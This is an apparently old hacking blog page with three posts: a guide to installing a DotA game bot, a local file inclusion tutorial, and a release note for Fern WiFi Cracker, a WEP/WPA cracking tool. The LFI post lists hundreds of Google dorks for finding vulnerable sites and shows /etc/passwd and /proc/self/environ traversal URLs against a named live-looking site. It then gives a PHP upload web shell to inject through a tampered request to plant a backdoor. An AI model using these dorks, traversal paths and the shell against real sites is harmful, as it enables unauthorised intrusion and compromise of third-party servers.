Recent Post

Flag Counter

Tuesday, July 19, 2011

[Tut] Install & config GhostOne bot DotA On windows platform inc picts

Tuesday, July 19, 2011  Unknown  No comments

Want to Create in public Server Dota?
Here How to Install and Config Ghost Bot DotA on Windows Platform including Spesific Picture
1. Download ghostone
Lets check the latest version in forum codelain and extract the zip
2. Next, You can install phpmyadmin using webdev just if You dont want installing that tool just using service in http://db4free.net Creat User .. Registration if Free

3. Next if You just intall webdev or sign up in di db4free.net ,Creat your database name exp: dbbot IMPORT file mysql_create_tables_v2.3one on Ghost Folder then EXTRACT ..Just wait in Sec ..
4. Next Open GHostOne.exe
5. Setup Config

Click "Apply Changes"


Click "Apply Changes"


Click "Apply Changes"


Click "Apply Changes"


Click "Apply Changes"

note: You can rename the map file order to be easy while you load the map in channel
6. Next Run Ghost

Search Terms:
  • GhostOne
 

Read More

Monday, April 18, 2011

[Tut] Local File Inculusion / LFI (/proc/self/environ)

Monday, April 18, 2011  Unknown  No comments

LFI (Local File Inclusion) /proc/self/environ Tamper data
LFI (Local File Inclusion)

What is LFI or Local File Inclusion?
This Description from Wikipedia
is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
Example of Php Vulnerable script

<?php $file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}

So this script PHP could be injected like
http://example.com/index.php?file=contactus.php


OK Now i will show you POC exploited This vulnerablity The Way backdoored shell via Tamper data

1.First.you could search in google Vulnerable website.HEre Are The list of Dorks ive collected..
Dorks :

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

 inurl:/include/new-visitor.inc.php?lvc_include_dir=

 inurl:/_functions.php?prefix=

 inurl:/cpcommerce/_functions.php?prefix=

 inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

 inurl:/modules/agendax/addevent.inc.php?agendax_path=

 inurl:/ashnews.php?pathtoashnews=

 inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

 inurl:/pm/lib.inc.php?pm_path=

 inurl:/b2-tools/gm-2-b2.php?b2inc=

 inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

 inurl:/modules/agendax/addevent.inc.php?agendax_path=

 inurl:/includes/include_once.php?include_file=

 inurl:/e107/e107_handlers/secure_img_render.php?p=

 inurl:/shoutbox/expanded.php?conf=

 inurl:/main.php?x=

 inurl:/myPHPCalendar/admin.php?cal_dir=

 inurl:/index.php/main.php?x=

 inurl:/index.php?include=

 inurl:/index.php?x=

 inurl:/index.php?open=

 inurl:/index.php?visualizar=

 inurl:/template.php?pagina=

 inurl:/index.php?pagina=

 inurl:/index.php?inc=

 inurl:/includes/include_onde.php?include_file=

 inurl:/index.php?page=

 inurl:/index.php?pg=

 inurl:/index.php?show=

 inurl:/index.php?cat=

 inurl:/index.php?file=

 inurl:/db.php?path_local=

 inurl:/index.php?site=

 inurl:/htmltonuke.php?filnavn=

 inurl:/livehelp/inc/pipe.php?HCL_path=

 inurl:/hcl/inc/pipe.php?HCL_path=

 inurl:/inc/pipe.php?HCL_path=

 inurl:/support/faq/inc/pipe.php?HCL_path=

 inurl:/help/faq/inc/pipe.php?HCL_path=

 inurl:/helpcenter/inc/pipe.php?HCL_path=

 inurl:/live-support/inc/pipe.php?HCL_path=

 inurl:/gnu3/index.php?doc=

 inurl:/gnu/index.php?doc=

 inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

 inurl:/forum/install.php?phpbb_root_dir=

 inurl:/includes/calendar.php?phpc_root_path=

 inurl:/includes/setup.php?phpc_root_path=

 inurl:/inc/authform.inc.php?path_pre=

 inurl:/include/authform.inc.php?path_pre=

 inurl:index.php?nic=

 inurl:index.php?sec=

 inurl:index.php?content=

 inurl:index.php?link=

 inurl:index.php?filename=

 inurl:index.php?dir=

 inurl:index.php?document=

 inurl:index.php?view=

 inurl:*.php?sel=

 inurl:*.php?session=&content=

 inurl:*.php?locate=

 inurl:*.php?place=

 inurl:*.php?layout=

 inurl:*.php?go=

 inurl:*.php?catch=

 inurl:*.php?mode=

 inurl:*.php?name=

 inurl:*.php?loc=

 inurl:*.php?f=

 inurl:*.php?inf=

 inurl:*.php?pg=

 inurl:*.php?load=

 inurl:*.php?naam=

 allinurl:/index.php?page= site:*.dk

 allinurl:/index.php?file= site:*.dk

 INURL OR ALLINURL WITH:

 /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

 /includes/header.php?systempath=

 /Gallery/displayCategory.php?basepath=

 /index.inc.php?PATH_Includes=

 /ashnews.php?pathtoashnews=

 /ashheadlines.php?pathtoashnews=

 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 /demo/includes/init.php?user_inc=

 /jaf/index.php?show=

 /inc/shows.inc.php?cutepath=

 /poll/admin/common.inc.php?base_path=

 /pollvote/pollvote.php?pollname=

 /sources/post.php?fil_config=

 /modules/My_eGallery/public/displayCategory.php?basepath=

 /bb_lib/checkdb.inc.php?libpach=

 /include/livre_include.php?no_connect=lol&chem_absolu=

 /index.php?from_market=Y&pageurl=

 /modules/mod_mainmenu.php?mosConfig_absolute_path=

 /pivot/modules/module_db.php?pivot_path=

 /modules/4nAlbum/public/displayCategory.php?basepath=

 /derniers_commentaires.php?rep=

 /modules/coppermine/themes/default/theme.php?THEME_DIR=

 /modules/coppermine/include/init.inc.php?CPG_M_DIR=

 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

 /coppermine/themes/maze/theme.php?THEME_DIR=

 /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

 /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

 /myPHPCalendar/admin.php?cal_dir=

 /agendax/addevent.inc.php?agendax_path=

 /modules/mod_mainmenu.php?mosConfig_absolute_path=

 /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

 /main.php?page=

 /default.php?page=

 /index.php?action=

 /index1.php?p=

 /index2.php?x=

 /index2.php?content=

 /index.php?conteudo=

 /index.php?cat=

 /include/new-visitor.inc.php?lvc_include_dir=

 /modules/agendax/addevent.inc.php?agendax_path=

 /shoutbox/expanded.php?conf=

 /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 /pivot/modules/module_db.php?pivot_path=

 /library/editor/editor.php?root=

 /library/lib.php?root=

 /e107/e107_handlers/secure_img_render.php?p=

 /zentrack/index.php?configFile=

 /main.php?x=

 /becommunity/community/index.php?pageurl=

 /GradeMap/index.php?page=

 /index4.php?body=

 /side/index.php?side=

 /main.php?page=

 /es/index.php?action=

 /index.php?sec=

 /index.php?main=

 /index.php?sec=

 /index.php?menu=

 /html/page.php?page=

 /page.php?view=

 /index.php?menu=

 /main.php?view=

 /index.php?page=

 /content.php?page=

 /main.php?page=

 /index.php?x=

 /main_site.php?page=

 /index.php?L2=

 /content.php?page=

 /main.php?page=

 /index.php?x=

 /main_site.php?page=

 /index.php?L2=

 /index.php?show=

 /tutorials/print.php?page=

 /index.php?page=

 /index.php?level=

 /index.php?file=

 /index.php?inter_url=

 /index.php?page=

 /index2.php?menu=

 /index.php?level=

 /index1.php?main=

 /index1.php?nav=

 /index1.php?link=

 /index2.php?page=

 /index.php?myContent=

 /index.php?TWC=

 /index.php?sec=

 /index1.php?main=

 /index2.php?page=

 /index.php?babInstallPath=

 /main.php?body=

 /index.php?z=

 /main.php?view=

 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

 /index.php?file=

 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=

 2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

 3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=

 4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

 5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

 6. allinurl:ihm.php?p=

 7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

 8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

 11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

 12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

 13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

 14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

 15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

 16. allinurl:ihm.php?p=*

 14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

 15. allinurl:.php?bodyfile=

 16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

 17. allinurl:forums.html
/modules.php?name=

 18. allinurl:/default.php?page=home

 19. allinurl:/folder.php?id=

 20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 22. allinurl:application.php?base_path=
/application.php?base_path=

 23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

 24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

 25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

 26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

 27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

 28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

 29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

 30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

 31. keyword : "Powered by iUser"
/common.php?include_path=

 32. allinurl: "static.php?load="
/static.php?load=

 33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

 34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

 35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=
LFI(Local File Inclusion)

 acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=


2.OK after Get the Website,Check That Website
For example;
http://vanessasbodymall.com/index.php?page=products.php

Is that website could call /etc/passwd File ????
You could add an ../../ << To go to that Server Website Directory
http://vanessasbodymall.com/index.php?page=/etc/passwd

3.So if '/etc/passwd' could be Called So that Site Vulnerable With LFI.So How To plant WebShell/Backdoor? > You should check Wheather /proc/self/environ < Could be Called ,So The URI likes below
http://vanessasbodymall.com/index.php?page=../../../../../../../../proc/self/environ

4.Upload Sheel via tamper data
You Should download That firefox plugin..Here i Give U the link
https://addons.mozilla.org/en-us/firefox/downloads/file/79565/tamper_data-11.0.1-fx.xpi?src=addondetail&confirmed=1

Ok Next Step after installing the plugin

a.Restart Your browser Mozilla Firefox
b.Then Click "Tool" > "MenuBar" and klik "Tamper Data"
c.Click start tamper > lalu refresh page tersebut
d.So will be pop up > Click "Tamper"
e.Replace This Code or You could Replace anything php evil code
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; }
else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

f.Yes Right..If You're Success plant That Php Script..This Script will be located at http://vanessasbodymall.com/Yourshellname.php

Search Terms :

  • local file inclusion
  • remote file inclusion
  • local file inclusion tutorial
  • local file inclusion vulnerability
  • lfi local file inclusion
  • local file inclusion exploit
  • local file include
  • web server vulnerability
  • vulnerability php
  • vulnerability of web server
  • web server attacks

Read More

Monday, November 22, 2010

FERN WIFI CRACKER New Version (wep and wpa Cracker tool)

Monday, November 22, 2010  Unknown  1 comment

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks
Operating System Supported

The Software runs on any Linux mahine with the programs prerequisites, But the program has been tested on the following Linux based Operating Systems: 

  • Ubuntu KDE/GNOME
  • BackTrack Linux
  • BackBox Linux

Prerequisites
The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on debian based systems using "apt-get install program" or otherwise downloaded and installed manually
  • Aircrack-NG
  • Python-Scapy
  • Python Qt4
  • Python
  • Subversion
  • Xterm
  • Reaver (for WPS Attacks)
  • Macchanger
  • Features
Fern Wifi Cracker currently supports the following features:
  • WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Update Support
Installation
Installation on Debian Package supported systems:
root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb
The Source Code for the program can be fetched using the following command on terminal
root@host:~# svn checkout http://fern-wifi-cracker.googlecode.com/svn/Fern-Wifi-Cracker/

This is Screenshot and description From the author

Fern wifi Cracker new release
Fern wifi Cracker

Fern wifi Cracker new release
Fern Wifi Cracker



Its Linux based, looks better on Gnome than KDE desktop interface, if
your using KDE the executable is in the directory /usr/local/bin/Fern-Wifi-Cracker , im giving this due to the fact that the debian installer was created for Gnome</
,so the shortcut will be created for gnome afer generic installation "dpkg -i Fern-Wifi-Cracker_1.0_all.deb" ,for KDE users, you may have to create a shortcut yourself
after the installation.
Just created the google code page for hosting it..... So please bear with the fact that i dont have a wiki help page yet

Download ( From Google Code )

DEVELOPER : Saviour Emmauel Ekiko

Source
http://www.backtrack-linux.org/forums/experts-forum/34517-new-fern-wifi-cracker.html
http://code.google.com/p/fern-wifi-cracker/

Search Terms:

  • Fern wifi cracker

Read More